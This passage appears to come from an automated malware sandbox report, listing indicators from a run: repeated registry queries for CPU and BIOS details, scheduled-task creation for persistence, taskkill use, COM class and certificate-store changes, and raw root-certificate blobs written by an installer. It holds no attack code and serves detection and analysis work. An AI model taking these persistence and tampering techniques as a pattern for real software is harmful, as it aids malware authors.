WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Adorarti.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Adorarti.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier EC80.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision EC80.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EC80.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe -
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6788 schtasks.exe 5732 schtasks.exe 4700 schtasks.exe 5212 schtasks.exe 4384 schtasks.exe 7812 schtasks.exe 5696 schtasks.exe 3324 schtasks.exe 6828 schtasks.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EC80.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU GcleanerEU.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 7 IoCs
pid Process 9020 taskkill.exe 7276 taskkill.exe 8668 taskkill.exe 7400 taskkill.exe 5744 taskkill.exe 6652 taskkill.exe 8808 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe -
Modifies registry class 17 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ gdgame.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Process not Found Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ bwWgtNFdD4gmaoUJi3mbqOX5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} vpn.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" vpn.tmp Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ bwWgtNFdD4gmaoUJi3mbqOX5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ bwWgtNFdD4gmaoUJi3mbqOX5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ bwWgtNFdD4gmaoUJi3mbqOX5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Process not Found Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{A0A2FABF-3380-412E-AD2B-2F765FCD0D78} Cleaner.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe